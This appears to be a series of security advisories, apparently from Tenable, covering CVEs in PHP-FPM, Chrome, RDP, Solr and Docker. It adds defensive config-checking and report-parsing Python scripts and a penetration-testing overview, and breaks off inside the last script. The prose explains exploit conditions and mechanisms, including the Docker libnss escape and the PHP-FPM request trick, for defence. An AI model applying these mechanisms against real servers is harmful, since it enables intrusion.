  • There is no such thing as a Cash App generator or Cash App hack that requires you to install a mobile application to get free money. You’re being used as a pawn to help a scammer earn money off the apps you install on your mobile phone.

Additionally, it is important to review your Cash App settings to fend off scammers. This includes ensuring you’ve enabled “Security Lock,” which requires your Cash App PIN in order to transfer funds. Keep your Cash App PIN to yourself and never share it with any person or any website.

Finally, you can restrict who has the ability to send you an incoming request for money to “Contacts Only,” which will thwart the Cash App scammers impersonating Cash App and other celebrities through incoming requests, asking you to send them money for verification purposes. Even with this setting enabled, you’ll still be able to send and receive money through Cash App normally.

As the old adage goes, if it sounds too good to be true, it probably is. In the case of Cash App giveaways, most of the time, it definitely is.

CVE-2019-11043: Vulnerability in PHP-FPM Could Lead to Remote Code Execution on nginx

Web servers using nginx and PHP-FPM are vulnerable to this flaw under certain conditions.

Background

On October 22, security researcher Omar Ganiev published a tweet regarding a “freshly patched” remote code execution vulnerability in PHP-FPM, the FastCGI Process Manager (FPM) for PHP. The tweet includes a link to a GitHub repository containing a proof of concept (PoC) for the vulnerability.

Analysis

CVE-2019-11043 is an env_path_info underflow flaw in PHP-FPM’s fpm_main.c. The vulnerability was first reported to the PHP bug-tracker by security researcher Emil Lerner on September 26, 2019. Lerner also credits Andrew Danau, security researcher at Wallarm, who identified the “anomaly” during a Capture The Flag competition in September 2019, and Ganiev for helping to finalize the php.ini options for the PoC.

According to Lerner, under certain configurations where a web server is using nginx and PHP-FPM, the vulnerability can be exploited to gain remote code execution. A specific set of preconditions must hold in the nginx configuration for the flaw to be exploitable:

  1. The nginx location directive forwards requests to PHP-FPM
  2. The fastcgi_split_path_info directive is present and includes a regular expression beginning with a ‘^’ symbol and ending with a ‘$’ symbol
  3. The fastcgi_param directive is used to assign the PATH_INFO variable
  4. There are no checks in place to determine whether or not a file exists (e.g., using try_files or an if statement)

It appears such configurations and preconditions are not uncommon. According to a recent tweet, Nextcloud, the open-source file hosting software, originally recommended the vulnerable nginx configuration in their installation documentation. Nextcloud has since changed the documentation following the tweet that reported it.

The PoC script included in the GitHub repository can query a target web server to identify whether or not it is vulnerable by sending specially crafted requests. Once a vulnerable target has been identified, attackers can send specially crafted requests by appending “?a=” in the URL to a vulnerable web server.

Proof of concept

The PoC script is available in the following GitHub repository.

Solution

On October 24, PHP 7.3.11 (current stable) and PHP 7.2.24 (old stable) were released to address this vulnerability along with other scheduled bug fixes. Those using nginx with PHP-FPM are encouraged to upgrade to a patched version as soon as possible.

If patching is not feasible, the suggested workaround is to include checks to verify whether or not a file exists. This is achieved either by including the try_files directive or using an if statement, such as if (-f $uri).
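To make the four preconditions and the workaround concrete, here is a small checker that scans an nginx configuration for location blocks meeting all four and reports them. It is an added example, not code from Tenable, PHP, nginx or the PoC repository. The two configurations embedded in it are constructed samples (one in the vulnerable shape, one with the try_files workaround); the parsing is regex-based rather than a full nginx parser, and it treats any fastcgi_pass directive as forwarding to PHP-FPM.

```python
"""Heuristic scan of an nginx configuration for the location-block shape behind
CVE-2019-11043. Added example: not Tenable, PHP or nginx code, and not the PoC
script. The two configurations below are constructed samples."""
import re

# Constructed sample: all four preconditions from the post hold in the PHP location block.
VULNERABLE_CONF = r"""
server {
    root /var/www/html;

    location ~ [^/]\.php(/|$) {
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        include fastcgi_params;
    }
}
"""

# Constructed sample: the same block with the file-existence check the post recommends
# as a workaround (try_files), which removes precondition 4.
HARDENED_CONF = r"""
server {
    root /var/www/html;

    location ~ [^/]\.php(/|$) {
        try_files $fastcgi_script_name =404;
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        include fastcgi_params;
    }
}
"""


def _strip_comments(conf):
    # Drop '#' comments so commented-out directives cannot trigger a finding.
    return "\n".join(line.split("#", 1)[0] for line in conf.splitlines())


def location_blocks(conf):
    """Return (matcher, body) pairs for every `location` block, matching braces by hand.
    Limitation: a '{' inside a location regex (e.g. a {n,m} quantifier) confuses the count."""
    text = _strip_comments(conf)
    blocks = []
    for m in re.finditer(r"\blocation\s+([^{]+?)\s*\{", text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        blocks.append((m.group(1).strip(), text[m.end():i - 1]))
    return blocks


def _directive(body, name):
    """Argument string of the first `name ...;` directive in a block body, or None."""
    m = re.search(r"(?m)^\s*%s\s+([^;]+);" % re.escape(name), body)
    return m.group(1).strip() if m else None


def check_location(body):
    """Return which of the post's four preconditions hold for one location block body.
    [1, 2, 3, 4] is the exploitable shape; anything less is not (by this heuristic)."""
    met = []
    if _directive(body, "fastcgi_pass") is not None:             # 1: forwards to FastCGI; assumed PHP-FPM
        met.append(1)
    split = _directive(body, "fastcgi_split_path_info")
    if split and split.startswith("^") and split.endswith("$"):  # 2: regex anchored with ^ and $
        met.append(2)
    if re.search(r"(?m)^\s*fastcgi_param\s+PATH_INFO\s", body):  # 3: PATH_INFO assigned
        met.append(3)
    has_file_check = (_directive(body, "try_files") is not None
                      or re.search(r"\bif\s*\(\s*-f\b", body) is not None)
    if not has_file_check:                                       # 4: no file-existence check
        met.append(4)
    return met


def find_vulnerable_locations(conf):
    """Matchers of the location blocks that meet all four preconditions."""
    return [matcher for matcher, body in location_blocks(conf)
            if check_location(body) == [1, 2, 3, 4]]


if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        print(name, "->", find_vulnerable_locations(conf) or "no matching location blocks")
```

Run against a real nginx.conf the checker only tells you that a block has the shape the preconditions describe; the definitive fix remains upgrading PHP, with try_files or an if (-f $uri) check as the interim workaround.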

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

CVE-2019-13720: Use-After-Free Zero Day in Google Chrome Exploited in the Wild

Though details are scant, Google released a patch for a Google Chrome vulnerability that has been exploited in the wild as a zero day.

Background

On October 31, Google published a Stable Channel Update for the desktop version of Google Chrome. This release fixes two vulnerabilities, one of which has been exploited in the wild as a zero day.

Analysis

CVE-2019-13720 is a use-after-free (UAF) vulnerability in audio for Google Chrome. It is unclear if the audio component referenced here is associated with content in the media/audio source. The flaw was reported to Google on October 29 by Kaspersky Lab researcher Alexey Kulaev and Anton Ivanov, Head of Advanced Threats Research and Detection. According to Kaspersky, the vulnerability was observed being exploited in the wild as a zero day.

Additional details about the flaw are restricted from the public, likely in an effort to give users and organizations time to apply patches. However, Kaspersky published some details on their blog, linking the vulnerability to an attack campaign called Operation WizardOpium.

In their blog, Kaspersky researchers identified the vulnerability by following malicious code injection on a Korean-language news portal. Due to “vulnerability disclosure principles,” Kaspersky has not disclosed specific details about the vulnerability itself. However, they do note the exploit “used a race condition bug between two threads due to missing proper synchronization between them.” This race condition results in the UAF that could lead to arbitrary code execution, which Kaspersky says “happens in our case.”

The other vulnerability patched in this Google Chrome for Desktop release is CVE-2019-13721, a UAF vulnerability in the PDFium library reported on October 12 by security researcher banananapenguin.

CVE-2019-13720 is the second UAF vulnerability in the audio component that has been patched in Google Chrome this month. On October 10, CVE-2019-13695, another audio UAF flaw, reported by Man Yue Mo of the Semmle Security Research Team was patched.

Proof of concept

At the time this blog was published, no proof of concept (PoC) for CVE-2019-13720 was available. However, Google acknowledges “an exploit” for the vulnerability “exists in the wild.”

Solution

Google addressed CVE-2019-13720 and CVE-2019-13721 in Google Chrome 78.0.3904.87 for Windows, Mac and Linux. Google notes the patched version will “roll out over the coming days/weeks,” according to the Security Advisory.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released. Additionally, Kaspersky provided indicators of compromise in their blog, which can also be used to identify systems affected by this operation.

CVE-2019-0708: BlueKeep Exploited in the Wild to Deliver Cryptocurrency Miner

Researchers identify the first in-the-wild exploit of the BlueKeep vulnerability nearly six months after it was disclosed.

Background

On November 2, security researchers Kevin Beaumont (@GossiTheDog) and Marcus Hutchins (@MalwareTechBlog) confirmed the first in-the-wild exploitation of CVE-2019-0708, also known as BlueKeep.

Analysis

CVE-2019-0708, a critical remote code execution vulnerability in Microsoft’s Remote Desktop Services, was patched back in May 2019. The vulnerability raised eyebrows, particularly because Microsoft released security updates for out-of-support versions of Windows, in an effort to thwart a potential worm that could spread just as WannaCry did in 2017. Beaumont is credited with naming the vulnerability “BlueKeep,” inspired by Game of Thrones. He subsequently set up BlueKeep honeypots to keep tabs on global attempts to exploit the flaw in-the-wild.

This weekend, Beaumont observed blue screens of death (BSODs) for his BlueKeep honeypots starting on November 2.

Beaumont shared a kernel crash dump from his honeypots with Hutchins, who confirmed this as the first exploitation of BlueKeep in the wild.

Hutchins shared his analysis in a blog post, where he identified the attackers were utilizing a recently released exploit module to distribute a cryptocurrency (or “coin”) miner, dubbed “BlueKeep Monero Miner” which is detected by 44% of scanners on VirusTotal as of November 3. Beaumont shared his insights in a blog post as well.

Though it took several months for the first in-the-wild exploit of BlueKeep to be seen, the expectation has always been there. Back in July, a cryptocurrency mining botnet known as WatchBog incorporated a BlueKeep scanning module to identify vulnerable systems. In August, there was chatter that a BlueKeep exploit would be incorporated into open-source tools.

While this in-the-wild exploit isn’t a WannaCry-level event, it serves as a cautionary reminder that organizations with vulnerable systems should prioritize patching them immediately.

Solution

Tenable recommends applying patches immediately. The following table contains the relevant security updates and monthly rollups for various products.

Security Update | Products
  • 4499175 (Security Only), 4499164 (Monthly Rollup) | Windows 7 32-bit (Service Pack 1); Windows 7 x64 (Service Pack 1); Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1; Windows Server 2008 R2 for x64-based Systems Service Pack 1; Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • 4499180 (Security Only), 4499149 (Monthly Rollup) | Windows Server 2008 for 32-bit Systems Service Pack 2; Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation); Windows Server 2008 for Itanium-Based Systems Service Pack 2; Windows Server 2008 for x64-based Systems Service Pack 2; Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • 4499180 (Security Update) | Windows Vista SP2; Windows Vista x64 Edition SP2
  • 4500331 (Security Update) | Windows XP SP3 x86; Windows XP Professional x64 Edition SP2; Windows XP Embedded SP3 x86; Windows Server 2003 SP2 x86; Windows Server 2003 x64 Edition SP2; Windows Server 2003 R2 SP2; Windows Server 2003 R2 x64 Edition SP2

In addition to patching, Tenable recommends the following mitigation steps:

  • Enable Network Level Authentication (NLA). Microsoft recommends NLA as a mitigation; however, NLA is something an organization may choose to deploy in addition to patching, not instead of it.
  • Block RDP (default is TCP port 3389) at your perimeter firewall.
  • Disable any unused services.
  • Upgrade end-of-life (EOL) operating systems. As a reminder, Windows 7 goes EOL on January 14, 2020.

Identifying affected systems

Tenable released a remote check plugin for CVE-2019-0708 after Microsoft disclosed the vulnerability. This plugin can identify affected systems without providing credentials.

To identify systems that do not have NLA enabled, please use plugin 58453.

A list of all plugins to identify BlueKeep (CVE-2019-0708) is available here.

Microsoft's November 2019 Patch Tuesday: Tenable Roundup

With over 70 CVEs, Microsoft’s November 2019 Patch Tuesday corrects 13 critical vulnerabilities, including a patch for an Internet Explorer vulnerability exploited in the wild.

Microsoft’s November 2019 Patch Tuesday contains updates for 74 CVEs, 13 of which are rated critical. This month’s release covers 16 remote code execution (RCE) vulnerabilities and 27 elevation of privilege (EoP) flaws across a variety of products. Additionally, Microsoft has patched an increased number of vulnerabilities in Hyper-V, a number of which were denial of service (DoS) flaws. The following is a breakdown of the most important CVEs from this month’s release.

CVE-2019-1429 | Scripting Engine Memory Corruption Vulnerability

CVE-2019-1429 is a critical flaw in Internet Explorer, which Microsoft notes as being exploited in the wild. This RCE exists due to a flaw in the way the scripting engine handles objects in memory in Internet Explorer. An attacker who is able to exploit this vulnerability could gain the same rights as the current user. Exploitation is somewhat mitigated in that an attacker would need to entice a user to visit a crafted web site or embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document.

CVE-2019-0721, CVE-2019-1397, CVE-2019-1398, CVE-2019-1399 | Hyper-V Remote Code Execution Vulnerabilities

CVE-2019-0721, CVE-2019-1397, CVE-2019-1398, and CVE-2019-1399 are RCE vulnerabilities in Windows Hyper-V. An attacker could run malicious code on a guest operating system that could cause the Windows Hyper-V host to execute arbitrary code. An attacker would need to gain access to a virtual machine (VM) through other means on the vulnerable host, but once access is obtained, an attacker could escape the VM sandbox and pivot to other VMs on the same host.

CVE-2019-1457 | Microsoft Office Excel Security Feature Bypass

CVE-2019-1457 is a security feature bypass vulnerability in Microsoft Office for Mac caused by a failure to enforce macro settings in an Excel document. This flaw was publicly disclosed on October 30 by Outflank, an IT Security firm focused on red teaming and security testing. The Outflank blog post details attack scenarios using the SYLK file format to include XLM macros into SYLK files. Because SYLK files do not open in Protected View, an end-user opening a specially crafted file would receive no warning or prompt from Excel about opening the file and would have none of the protection offered by the Protected View security feature. Additionally, if Office for Mac has been configured to use the “Disable all macros without notification” feature, XLM macros in SYLK files can be executed without prompting the user, thereby allowing a remote attacker to execute arbitrary code with the privileges of the user opening the specially crafted file.

CVE-2019-0712, CVE-2019-1310, CVE-2019-1309, and CVE-2019-1399 | Hyper-V Denial of Service Vulnerabilities

CVE-2019-0712, CVE-2019-1310, CVE-2019-1309, and CVE-2019-1399 are denial of service (DoS) vulnerabilities within Windows Hyper-V. An attacker who has the toolsets to exploit these vulnerabilities could consume the resources of a target server and cause it to crash. To exploit them, attackers need a privileged account on a guest operating system running as a VM on the host.

CVE-2019-16863 | Microsoft Guidance for Vulnerability in Trusted Platform Module (TPM)

As part of the November updates, Microsoft released the security advisory ADV190024 to discuss CVE-2019-16863. In certain Trusted Platform Module (TPM) chipsets, a vulnerability exists which weakens key confidentiality protection for the Elliptic Curve Digital Signature Algorithm (ECDSA). While this flaw is not in Windows and does not exist in a specific application, it was important enough that Microsoft released this advisory. Administrators are encouraged to contact their TPM manufacturer for firmware updates as well as verify additional mitigation steps that may be required beyond a firmware update. At the time this blog was published, Microsoft notes that there does not appear to be any evidence of an exploit in the wild and that the issue was reported through coordinated disclosure.

Tenable Solutions

Users can create scans that focus specifically on our Patch Tuesday plugins. From a new advanced scan, in the plugins tab, set an advanced filter for Plugin Name Contains November 2019.

With that filter set, click on the plugin families to the left, and enable each plugin that appears on the right side. Note that if a family on the left says Enabled, all of the plugins in that family are already set; disable the whole family before selecting the individual plugins for this scan. Here’s an example from Tenable.io:

A list of all of the plugins released for Tenable’s November 2019 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems that are yet to be patched.

As a reminder, Windows 7 support will be discontinued on January 14, 2020, so we strongly recommend reviewing what hosts remain and any action plans for migration. Plugin ID 11936 (OS Identification) can be useful for identifying hosts that are still running on Windows 7.

CVE-2019-12409: Default Configuration in Apache Solr Could Lead to Remote Code Execution

Linux servers using Apache Solr versions 8.1.1 and 8.2.0 with default configurations are potentially vulnerable to remote code execution.

Background

On July 22, 2019, a configuration flaw was found in versions 8.1.1 and 8.2.0 of Apache Solr, the open-source search-engine platform. John Ryan originally reported the issue, and credit was also given to Matei “Mal” Badanoiu for noting the flaw could lead to remote code execution (RCE).

Analysis

CVE-2019-12409 is a flaw in the default configuration of the solr.in.sh file in Apache Solr. If this file is used in its default configuration in versions 8.1.1 and 8.2.0, unauthenticated access to the Java Management Extensions (JMX) monitoring on the RMI_PORT (default 18983) is allowed. Anyone with access to a vulnerable Solr server, and, in turn, JMX, could upload malicious code that could then be executed.

Proof of concept

There is currently a proof of concept (PoC) available in a GitHub repository implementing the MJET script by MOGWAI LABS to create a reverse shell on a system with the vulnerable configuration.

Solution

On November 18, Apache Solr revised the originally reported bug report after it was found that the flaw could lead to RCE. In addition, the Changelog highlighted this flaw as one of the fixes in Apache Solr version 8.3.

Per the security advisory, this vulnerability can also be remediated by setting the ENABLE_REMOTE_JMX_OPTS parameter to 'false' in the solr.in.sh file. The change can be confirmed by ensuring the com.sun.management.jmxremote* properties are no longer listed in the Solr Admin interface under the Java Properties section.
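The two checks the advisory describes (the ENABLE_REMOTE_JMX_OPTS setting in solr.in.sh, and the absence of com.sun.management.jmxremote* properties afterwards) can be scripted. The following is an added example, not Apache's or Tenable's code; the solr.in.sh contents and the Java-properties dictionaries are constructed samples, and the RMI_PORT default of 18983 is the one the post quotes.

```python
"""Audit a Solr solr.in.sh for the unauthenticated JMX exposure behind CVE-2019-12409.

Added example, not Apache's or Tenable's code. The solr.in.sh snippets and the
Java-properties views below are constructed; ENABLE_REMOTE_JMX_OPTS, RMI_PORT and
the com.sun.management.jmxremote* prefix are the names the advisory refers to.
"""
import re

# Port the JMX/RMI listener uses when solr.in.sh does not override RMI_PORT.
DEFAULT_RMI_PORT = 18983
JMX_PROPERTY_PREFIX = "com.sun.management.jmxremote"

_ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*?)\s*$")


def parse_env_file(text):
    """Return {NAME: value} for the shell assignments in a solr.in.sh.

    Commented lines are skipped, surrounding quotes are stripped, and a later
    assignment overrides an earlier one, matching shell semantics.
    """
    env = {}
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[name] = value
    return env


def jmx_exposure(env):
    """Return (exposed, port): exposed is True when remote JMX is switched on."""
    enabled = env.get("ENABLE_REMOTE_JMX_OPTS", "").strip().lower() == "true"
    port_text = env.get("RMI_PORT", "").strip()
    port = int(port_text) if port_text.isdigit() else DEFAULT_RMI_PORT
    return enabled, port


def leaked_jmx_properties(java_properties):
    """Given the Java properties the Solr Admin UI lists, return the ones that
    show remote JMX is still active (e.g. the file was edited but Solr not restarted)."""
    return sorted(k for k in java_properties if k.startswith(JMX_PROPERTY_PREFIX))


# Constructed sample in the vulnerable shape of solr.in.sh from 8.1.1 / 8.2.0 ...
VULNERABLE_SOLR_IN_SH = """\
# Constructed solr.in.sh sample (not the real shipped file)
#SOLR_HEAP="512m"
ENABLE_REMOTE_JMX_OPTS="true"
# RMI_PORT=18983
"""

# ... and the remediated shape from the advisory.
HARDENED_SOLR_IN_SH = VULNERABLE_SOLR_IN_SH.replace('"true"', '"false"')

# Constructed Java-properties views for each state.
PROPS_BEFORE = {"com.sun.management.jmxremote.port": "18983",
                "com.sun.management.jmxremote.authenticate": "false",
                "solr.solr.home": "/var/solr/data"}
PROPS_AFTER = {"solr.solr.home": "/var/solr/data"}

if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_SOLR_IN_SH), ("hardened", HARDENED_SOLR_IN_SH)):
        exposed, port = jmx_exposure(parse_env_file(text))
        state = f"ENABLED on port {port}" if exposed else "disabled"
        print(f"{label}: remote JMX {state}")
    print("properties still present:", leaked_jmx_properties(PROPS_BEFORE))
```

Run the file check against the solr.in.sh actually in use (it may live outside the install directory), then compare the Admin UI's Java Properties against the second function after a restart; a "false" in the file with the properties still listed means the running process has not picked up the change.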

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.


CVE-2019-14271: Proof of Concept for Docker Copy (docker cp) Vulnerability Released


Proof-of-concept (PoC) code for a security flaw in Docker, the popular containerization platform, is now public.

Background

On November 19, researchers at Unit 42, Palo Alto Networks’ research team, published their analysis of a severe vulnerability in the popular container deployment platform, Docker.

Analysis

CVE-2019-14271 is a critical code injection flaw in the Docker copy (docker cp) command, which is used to copy files between containers. Exploitation of this flaw can lead to full container escape by an attacker. It is important to note that to exploit this vulnerability, an attacker would need to include the exploit code in a malicious Docker container image or compromise a container either via another vulnerability or using previously leaked Docker secrets.

While the vulnerability was patched back in July 2019, researchers from Unit 42 published their analysis of the flaw on November 19. According to these researchers, the vulnerability exists in docker cp because a helper process (docker-tar) improperly loads specific libraries from the container file system rather than from the host file system. Specifically, docker-tar loads the Name Service Switch (NSS) libraries, identified by their filenames beginning with libnss. Targeting docker-tar presents an attacker with the necessary capability to gain full root access on the host file system.

To demonstrate exploitation of CVE-2019-14271, the researchers created their own version of an NSS library (libnss_files.so) and added a function called run_at_link(). The function performs a check to ensure it has been invoked by docker-tar first, followed by a step to replace the malicious libnss_files.so file with the legitimate one, because it is only intended to run once. Finally, the NSS library will request an executable that writes a message to a specified path (/evil) and mounts the host filesystem on the container at the /host_fs path. A video demonstration of this exploit can be found in the Palo Alto Networks blog.

Proof of concept

In their blog, Unit 42 researchers included a PoC in the form of a malicious NSS library file, libnss_files.so.

Solution

As mentioned previously, Docker patched this vulnerability back in July in Docker version 19.03.1. Docker users are encouraged to update as soon as possible.

If updating to a patched version is not feasible at this time, users are strongly encouraged to only use trusted Docker container images that have been verified and/or signed. Additionally, please consider using non-root users when launching containers, as that would mitigate the threat this vulnerability poses.
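The two actions above (confirm the daemon is at 19.03.1 or later, and check which containers still run as root) can be folded into a quick triage script. This is an added example, not Docker's or Unit 42's code; the version string and the `docker inspect` JSON below are constructed stand-ins for the output of `docker version --format '{{.Server.Version}}'` and `docker inspect`, and `Config.User` is the field `docker inspect` reports.

```python
"""Triage a Docker host against the CVE-2019-14271 advice in the post.

Added example, not Docker's or Unit 42's code. The version string and the
docker inspect JSON are constructed; Config.User is the real field docker
inspect reports for a container's configured user.
"""
import json
import re

# Release that carried the docker cp fix, per the post.
FIXED_VERSION = (19, 3, 1)


def parse_docker_version(text):
    """Turn '19.03.1' or '18.09.7-ce' into a comparable tuple of ints."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised Docker version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_patched(version_text):
    return parse_docker_version(version_text) >= FIXED_VERSION


def root_containers(inspect_json):
    """Return names of containers whose Config.User is empty, 'root' or '0'.

    docker inspect emits a JSON array; an empty User means the image default,
    which is root unless the Dockerfile set USER.
    """
    names = []
    for c in json.loads(inspect_json):
        user = (c.get("Config", {}).get("User") or "").split(":")[0]
        if user in ("", "root", "0"):
            names.append(c.get("Name", "?").lstrip("/"))
    return names


def triage(version_text, inspect_json):
    """Return a list of human-readable findings; an empty list means nothing to do."""
    findings = []
    if not is_patched(version_text):
        findings.append(f"Docker {version_text.strip()} predates 19.03.1; "
                        "docker cp is affected by CVE-2019-14271")
    for name in root_containers(inspect_json):
        findings.append(f"container {name} runs as root; a non-root USER limits "
                        "what a compromised container can reach")
    return findings


# Constructed stand-in for: docker version --format '{{.Server.Version}}'
SAMPLE_VERSION = "19.03.0"
# Constructed stand-in for: docker inspect $(docker ps -q)
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "Config": {"User": ""}},
    {"Name": "/api", "Config": {"User": "app:app"}},
    {"Name": "/batch", "Config": {"User": "0"}},
])

if __name__ == "__main__":
    for finding in triage(SAMPLE_VERSION, SAMPLE_INSPECT):
        print("-", finding)
```

The version check is the one that matters for this CVE; the root-user check is there because the post's second mitigation only helps for containers that were actually started without root, which `docker inspect` makes easy to confirm fleet-wide.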

Identifying affected systems

A list of Tenable plugins to identify this vulnerability can be found here.


How Vulnerability Scanning Is Used for Penetration Testing


By the time a data breach occurs, it may be too late to measure the effectiveness of your vulnerability management program. Penetration testing can help detect weaknesses – before threat actors do. Here’s how to get started.

Looking to proactively measure the effectiveness of your vulnerability management program? How can you assess the strengths and weaknesses of your program before a data breach occurs? 

Penetration testing – of which vulnerability scanning is a key component – can help your organization find weaknesses, allowing you to resolve them before threat actors can exploit them. 

Gauge your vulnerability assessment maturity

If you’re unsure of the maturity of your vulnerability assessment and management program, check out this short What’s Your Cyber Defender Style? quiz to see how your organization’s cybersecurity practices rank. You can also get more information about the maturity of your organization’s vulnerability assessment practices in the Cyber Defender Strategies report.

Before delving into the critical role vulnerability scanning plays within penetration testing, let’s define its purpose and how it differs from vulnerability management and assessment.

What is penetration testing?

Penetration testing is a stand-alone activity, often repeated quarterly or annually by a third party. The primary objective is to provide organizations with independent insight into the effectiveness of their vulnerability assessment and management processes. 

Penetration tests generally consist of five phases: 

  1. Initial engagement: Selecting a firm to conduct the penetration test and outlining goals and expectations
  2. Scoping: Establishing the targets, methodology and boundaries for the test
  3. Testing: Conducting the penetration test based on agreed-upon parameters
  4. Reporting: Reviewing the findings from the penetration test
  5. Follow-up: Tracking remediation progress and retesting

Tip: During the scoping phase, it’s best to share results from your organization's vulnerability management program, so the third-party penetration tester has a baseline to draw accurate conclusions on the efficacy of your program.

The difference between penetration testing and vulnerability management

Penetration testing sheds light on whether the vulnerability assessment and management program is working correctly and indicates areas of improvement. For example, the penetration test provides a point-in-time view of whether environments contain known vulnerabilities. Vulnerability management, on the other hand, is ongoing and continuous. 

The organization’s cybersecurity operations team is responsible for vulnerability management. They inform, drive, prioritize and verify vulnerability remediation for an organization. For this reason, the security team should perform vulnerability scans as frequently as operationally possible because the list of known vulnerabilities changes from day to day, as does their threat level.

Where does vulnerability scanning fit in?

During the testing phase of a penetration test, depending on the scope, the tester will perform vulnerability scans across an organization’s entire attack surface or a specifically targeted subset. The latter could include, but is not limited to: external networks, internal networks, cloud assets, web applications, IoT and/or OT. 

These tests take two primary approaches: 

  1. Blackbox testing, where no information is shared with the tester
  2. Whitebox testing, where all information about the target is shared with the tester

Nessus Professional, the most widely used vulnerability scanner in the world, can assist with both of these test types as it provides out-of-the-box templates for both credentialed and non-credentialed scanning.

Vulnerability scanning in blackbox testing

When scanning for vulnerabilities as part of blackbox testing, network sweeps are typically performed using Internet Control Message Protocol (ICMP), Transmission Control Protocol (TCP) or Address Resolution Protocol (ARP) pings without the use of credentials. Once an asset is discovered, the scan will query any open network ports on the device to collect: 

  • Operating system information about the device
  • The network services running on the device
  • The network-based vulnerabilities on the device

This information is then used to determine the vulnerabilities that reside on the target that may be susceptible to remote exploitation, which is particularly problematic for assets on an external network.

Vulnerability scanning in whitebox testing

Vulnerability scanning during whitebox testing is usually a lot more targeted, as all the information about the target is already known. This vulnerability scan would typically be performed using a credentialed vulnerability and configuration scan, whereby the scanner would remotely log in to an asset and assess any vulnerabilities or configurations that may be susceptible to exploitation with both local and remote attacks.

How can Nessus Professional help with penetration testing?

Nessus Professional has built-in templates you can use to perform both blackbox and whitebox tests quickly and easily. These templates enable credentialed, non-credentialed and configuration scanning, which support several compliance frameworks: CIS, HIPAA, DISA STIG and many others. 

Tailor templates to suit the required level of testing

You can customize the templates to suit the level of testing required. For instance, you can set your preference to avoid false positives or false negatives. 

To avoid false positives, Nessus Professional, by default, will only report vulnerabilities that it can confirm exist. During a penetration test, this may not be the desired output. Instead, the penetration tester may want to collect information on all possible vulnerabilities and then perform manual testing to eliminate any false positives within the results. 

Also, Nessus Professional, by default, is configured to only perform safe checks, which means the scans carried out as part of the penetration test will cause no damage or downtime to the targets. The data collected during the vulnerability scans can easily be exported to assist the penetration tester in building their report using metrics like CVSS to help the organization understand the criticality of the findings.

The data collected during these tests can also be used to drive other key aspects of penetration testing. For instance, during a testing scenario, the data that has been collected can be used to map out cyberattack paths, including: 

  • How an attack could breach an organization’s network
  • How a breach could traverse the network once inside
  • What key assets could be exploited – and the level of data loss that may occur

In turn, the scenarios can then be used to: 1) inform the organization where their weaknesses lie and 2) perform simulated, non-damaging attacks on the organization’s environment to test out their defenses and responses to such an attack. 
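Both the export described above (findings with CVSS scores feeding a report) and the earlier Patch Tuesday post's tip of using plugin 11936 to find hosts still on Windows 7 start from the same artifact: a .nessus export. The script below is an added example, not Tenable's code, that parses one and produces the pieces a tester would drop into a report. The sample export is constructed to mirror the element names of a NessusClientData_v2 file; the hosts, plugins 90001/90002 and the CVE value are placeholders, while 11936 is the real OS Identification plugin the post names.

```python
"""Summarise a Nessus export (.nessus, NessusClientData_v2 XML) for a report:
severity counts per host, the top findings by CVSS, and hosts that plugin 11936
(OS Identification) still reports as Windows 7.

Added example, not Tenable's code. The export below is constructed to mirror
the element names of a v2 export (ReportHost, ReportItem, cvss_base_score,
plugin_output); hosts, plugins 90001/90002 and the CVE are placeholders.
"""
import xml.etree.ElementTree as ET
from collections import Counter

OS_IDENTIFICATION_PLUGIN = "11936"
# Nessus severity attribute: 0 info, 1 low, 2 medium, 3 high, 4 critical.
SEVERITY_NAMES = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}


def parse_nessus(xml_text):
    """Return a list of finding dicts, one per ReportItem."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            cvss = item.findtext("cvss_base_score")
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port", "0")),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
                "severity": SEVERITY_NAMES.get(int(item.get("severity", "0")), "info"),
                "cvss": float(cvss) if cvss else None,
                "cves": [c.text for c in item.findall("cve")],
                "output": item.findtext("plugin_output") or "",
            })
    return findings


def severity_by_host(findings):
    """{host: Counter({'critical': n, ...})}, ignoring informational items."""
    out = {}
    for f in findings:
        if f["severity"] != "info":
            out.setdefault(f["host"], Counter())[f["severity"]] += 1
    return out


def top_findings(findings, limit=5):
    """Highest-CVSS findings first, as (cvss, host, plugin name) tuples."""
    scored = [f for f in findings if f["cvss"] is not None]
    scored.sort(key=lambda f: f["cvss"], reverse=True)
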